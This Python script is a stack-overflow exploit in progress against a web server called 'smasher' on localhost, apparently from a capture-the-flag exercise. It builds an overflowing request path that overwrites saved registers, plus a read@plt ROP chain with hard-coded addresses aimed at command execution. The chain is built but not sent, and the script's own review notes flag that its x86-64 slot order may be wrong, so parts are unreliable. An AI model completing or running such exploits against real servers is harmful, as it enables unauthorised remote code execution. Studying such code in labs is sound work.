#!/usr/bin/python
import os, sys, socket
import struct
import requests
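# Stack-overflow probe for the "smasher" web server: the request path is the
# overflow buffer.  Stage 1 only delivers filler + register overwrites and
# reports the HTTP status / payload length; the read@plt ROP chain sketched by
# the original author is built by build_rop_chain() but, as before, not sent.
TARGET_URL = r'http://localhost:9999/'

# Bytes that follow the slash.  Per the original note, GET delivery needs a
# short leader whose first 4 bytes the server "takes off the buffer", so
# 4 bytes of the filler budget are spent here.
LEADER = r'\AAAA'

# Measured overflow distance: the author expected 536 - 4 but found 535.
BUFFER_LEN = 535

# Addresses from the target binary (non-PIE x86-64 ELF: the original quotes
# the objdump line "0000000000400cf0 <read@plt>").
READ_PLT = 0x400cf0      # read@plt
PPPR_GADGET = 0x401787   # "PPPR" per the original: pop;pop;pop;ret (registers not shown -- verify in the disassembly)
DYNAMIC_ADDR = 0x602e28  # .dynamic: where the original chain reads `cmd` into
STDIN_FD = 0             # fd passed to read(): the command arrives on the server's stdin

SAVED_RBX = 'B' * 8
SAVED_RBP = 'C' * 8


def build_payload(buffer_len=BUFFER_LEN, padding=150):
    """Return the GET URL whose path overflows the server's stack buffer.

    Layout of the path (all printable ASCII so it survives as a URL):
      LEADER                    5 bytes, 4 of which the server consumes
      'A' * (buffer_len - 4)    filler up to the saved registers
      'B' * 8                   overwrites saved RBX
      'C' * 8                   overwrites saved RBP
      'D' * padding             continues past RBP into the return address / RSP

    Args:
        buffer_len: measured distance to the saved registers (default 535).
        padding: number of 'D' bytes appended after the saved RBP.

    NOTE(review): requests.get() may percent-encode the backslash in LEADER
    before it hits the wire, which would shift the layout by two bytes;
    confirm the on-the-wire length equals len(payload) when calibrating.
    """
    parts = [
        TARGET_URL + LEADER,
        'A' * (buffer_len - 4),
        SAVED_RBX,
        SAVED_RBP,
        'D' * padding,
    ]
    return ''.join(parts)


def build_rop_chain(cmd):
    """Return the stage-1 chain: read(STDIN_FD, DYNAMIC_ADDR, len(cmd)) as bytes.

    Slots, in the order the original author laid them out:
      READ_PLT, PPPR_GADGET, STDIN_FD, DYNAMIC_ADDR, len(cmd)

    Packed as little-endian 64-bit words ("<Q").  The target is x86-64
    (saved RBX/RBP, 0x40xxxx text addresses), so the original "<I" packing
    would have produced 4-byte slots and misaligned every entry after the first.

    NOTE(review): the slot order above is the 32-bit ret2plt convention
    (callee first, pop-ret to discard stack args).  On x86-64 read() takes its
    arguments in rdi/rsi/rdx, so if PPPR_GADGET really is pop rdi/rsi/rdx;ret
    the gadget and its three values must precede READ_PLT.  Left as written
    because the gadget's registers are not shown here; confirm before sending.

    Args:
        cmd: the command string the server is meant to read(); its length is
             the third argument.  The commented-out original appended "\\0" --
             add it back if the read target must be NUL-terminated.
    """
    slots = (READ_PLT, PPPR_GADGET, STDIN_FD, DYNAMIC_ADDR, len(cmd))
    return b''.join(struct.pack('<Q', slot) for slot in slots)


def main():
    """Send the stage-1 probe and report what came back.

    The command defaults to 'ls'; an optional argv[1] overrides it (the
    behaviour the original had commented out).  The ROP chain is built but,
    as in the original, not appended to the request.
    """
    cmd = sys.argv[1] if len(sys.argv) > 1 else 'ls'
    payload = build_payload()
    chain = build_rop_chain(cmd)  # built for inspection only; not delivered yet
    try:
        r = requests.get(payload)
        print(r.status_code)
    except requests.exceptions.RequestException as exc:
        # A crashed or reset connection is a plausible outcome of a successful
        # overflow; report it instead of tracing back.
        print('request failed: %s' % exc)
    print(len(payload))
    print(len(chain))


if __name__ == '__main__':
    main()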